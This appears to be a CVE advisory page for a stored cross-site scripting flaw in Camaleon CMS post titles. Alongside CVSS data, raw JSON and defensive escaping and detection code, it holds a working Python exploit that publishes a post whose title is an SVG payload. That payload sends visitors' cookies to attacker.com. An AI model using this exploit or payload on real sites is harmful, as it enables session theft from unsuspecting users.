Security Vulnerability Report
CVE-2023-53936 CVSS 4.8 MEDIUM

Published: 2025-12-18 20:15:52
Last Modified: 2026-01-16 19:16:13

Description

Camaleon CMS 2.7.4 (spelled "Cameleon CMS" in the CVE record) contains a persistent (stored) cross-site scripting vulnerability, CWE-79: a post title is stored and later rendered without HTML encoding, so an authenticated user with post-creation rights can inject markup through it. The attacker creates a post whose title holds an SVG element carrying an event handler; the script runs in the browser of any user who mouses over that title, in the site's origin and with the victim's session, and can exfiltrate data or perform actions as that user. The record describes the attacker as an administrator and the primary CVSS 3.1 vector rates the required privilege as High, but the CNA's CVSS 4.0 vector rates it Low, so do not assume only administrators can plant the payload. The session-cookie theft named in the description only works if the session cookie is readable from script, i.e. lacks the HttpOnly flag; with HttpOnly set the injected script still runs with the victim's authority but cannot read the cookie value.
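To make the mechanism concrete, the Python below (added here; it is not code from Camaleon CMS, VulnCheck or Exploit-DB) renders a stored title once the unsafe way and once with HTML escaping, and scans a set of constructed titles for the SVG/event-handler markup this CVE describes, which is the check an incident responder would run over a dump of the posts table after an exposure. The sample titles, the wrapper markup, the helper names and the regular expression are assumptions for illustration; Camaleon CMS's real templates are Rails/ERB and are not reproduced.

```python
import html
import re

# Constructed sample titles (assumed; not taken from any real installation).
SAMPLE_TITLES = [
    "Welcome to our blog",
    "Q&A: <b>bold</b> ideas",
    '<svg onmouseover=fetch("https://attacker.example/steal?c="+document.cookie)>',
    "<img src=x onerror=alert(1)>",
    "Tom & Jerry's \"Great\" Adventure",
]

# Markup that indicates an injected title: a tag that can carry script or
# event-handler attributes, or any on*= handler attribute. Case-insensitive
# and tolerant of the "<svg/onload=" spelling used to dodge naive filters.
INJECTION_RE = re.compile(
    r"<\s*/?\s*(svg|script|img|iframe|math|object|embed|video|audio|body|details)\b"
    r"|\bon[a-z]+\s*=",
    re.IGNORECASE,
)

WRAP_OPEN = '<h2 class="post-title">'
WRAP_CLOSE = "</h2>"


def render_title_vulnerable(title: str) -> str:
    """Interpolates the stored title into the page unchanged. This is the
    behaviour the CVE describes: an SVG/event-handler payload is emitted
    as-is and the browser parses it as markup."""
    return f"{WRAP_OPEN}{title}{WRAP_CLOSE}"


def render_title_hardened(title: str) -> str:
    """Escapes &, <, >, " and ' so the title is displayed as text."""
    return f"{WRAP_OPEN}{html.escape(title, quote=True)}{WRAP_CLOSE}"


def looks_injected(title: str) -> bool:
    """True when a stored title contains the kind of markup used in this CVE."""
    return INJECTION_RE.search(title) is not None


def find_suspicious_titles(titles):
    """Hunt helper: returns the titles that should be reviewed and cleaned."""
    return [t for t in titles if looks_injected(t)]


def is_safe_output(rendered: str) -> bool:
    """Checks a rendered fragment: the text between the wrapper tags must
    contain no raw '<', so nothing inside it can open a new element."""
    inner = rendered[len(WRAP_OPEN):-len(WRAP_CLOSE)]
    return "<" not in inner


if __name__ == "__main__":
    for title in find_suspicious_titles(SAMPLE_TITLES):
        print("[!] suspicious title:", title)
    for title in SAMPLE_TITLES:
        print("vulnerable:", render_title_vulnerable(title))
        print("hardened:  ", render_title_hardened(title))
```

Escaping at output time is the fix that matters; rejecting titles on input (the regex above) is only a detection aid, because a blocklist of tag names is easy to bypass and legitimate titles may contain "&" or quotes that still need encoding.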

CVSS Details

CVSS Score
4.8
Severity
MEDIUM
CVSS Vector (CVSS 3.1, primary)
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
CVSS Vector (CVSS 4.0, CNA, secondary)
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N (base score 5.1, MEDIUM)
Weakness
CWE-79 (Improper Neutralization of Input During Web Page Generation)

The two vectors agree on a network-reachable, low-complexity stored XSS whose impact lands on other users' browsers (Scope Changed in 3.1, subsequent-system impact in 4.0), but differ on the privilege the attacker needs: High in the 3.1 vector, Low in the 4.0 vector.

Configurations (Affected Products)

cpe:2.3:a:tuzitio:camaleon_cms:2.7.4:*:*:*:*:*:*:* - VULNERABLE
Camaleon CMS 2.7.4 (written "Cameleon CMS" in the CVE record). The CPE match lists 2.7.4 only; the "<= 2.7.4" range given with the PoC below is not backed by the record's configuration data.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2023-53936 PoC - Camaleon CMS Stored XSS via Post Title
# Author: VulnCheck
# Target: Camaleon CMS <= 2.7.4
#
# Camaleon CMS is a Rails application: its forms carry an authenticity_token
# and a POST without a valid one is rejected, so the token is read from an
# admin page before each request instead of being sent empty. The admin paths
# and form field names below are those used by the original PoC; adjust them
# if the target installation differs.
import re
import requests

# Configuration
TARGET_URL = "http://target-server/cameleon-cms"
USERNAME = "admin"
PASSWORD = "admin_password"

# XSS payload - SVG-based script injection. The CVE description says the
# script runs when another user mouses over the post title, hence onmouseover.
XSS_PAYLOAD = '<svg onmouseover=fetch("https://attacker.com/steal?cookie="+document.cookie)>'

# Matches either the hidden form field or the <meta name="csrf-token"> tag
# that Rails emits on every page.
TOKEN_RE = re.compile(
    r'name="(?:authenticity_token|csrf-token)"\s+(?:value|content)="([^"]+)"'
)


def get_csrf_token(session, url):
    """Fetch a page and extract the Rails authenticity token from it."""
    response = session.get(url)
    match = TOKEN_RE.search(response.text)
    return match.group(1) if match else ""


def login():
    """Authenticate and return a session holding the admin cookie, or None."""
    session = requests.Session()
    login_url = f"{TARGET_URL}/admin/login"
    data = {
        "authenticity_token": get_csrf_token(session, login_url),
        "user[username]": USERNAME,
        "user[password]": PASSWORD,
    }
    response = session.post(login_url, data=data)
    # A successful login redirects away from the login page; a failed one
    # re-renders it with HTTP 200, so the status code alone is not enough.
    if response.ok and not response.url.rstrip("/").endswith("/admin/login"):
        return session
    return None


def create_malicious_post(session):
    """Create a post with the XSS payload in its title."""
    post_url = f"{TARGET_URL}/admin/posts"
    data = {
        "authenticity_token": get_csrf_token(session, post_url),
        "post[title]": XSS_PAYLOAD,
        "post[content]": "Malicious content",
        "post[status]": "published",
    }
    response = session.post(post_url, data=data)
    return response.ok


def main():
    print("[*] CVE-2023-53936 PoC - Camaleon CMS Stored XSS")
    session = login()
    if session:
        print("[+] Login successful")
        if create_malicious_post(session):
            print("[+] Malicious post created successfully")
            print("[*] XSS payload will execute when users hover over the post title")
        else:
            print("[-] Post creation failed")
    else:
        print("[-] Login failed")


if __name__ == "__main__":
    main()

References

https://github.com/owen2345/camaleon-cms (Product)
https://www.exploit-db.com/exploits/51446 (Exploit, Third Party Advisory)
https://www.vulncheck.com/advisories/cameleon-cms-authenticated-persistent-cross-site-scripting-via-post-creation (Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53936", "sourceIdentifier": "[email protected]", "published": "2025-12-18T20:15:51.843", "lastModified": "2026-01-16T19:16:13.203", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cameleon CMS 2.7.4 contains a persistent cross-site scripting vulnerability that allows authenticated administrators to inject malicious scripts into post titles. Attackers can create posts with embedded SVG scripts that execute when other users mouse over the post title, potentially stealing session cookies and executing arbitrary JavaScript."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tuzitio:camaleon_cms:2.7.4:*:*:*:*:*:*:*", "matchCriteriaId": "0CA4ECFC-FCEE-486E-91A6-38D7E19CBA54"}]}]}], "references": [{"url": "https://github.com/owen2345/camaleon-cms", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51446", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/cameleon-cms-authenticated-persistent-cross-site-scripting-via-post-creation", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}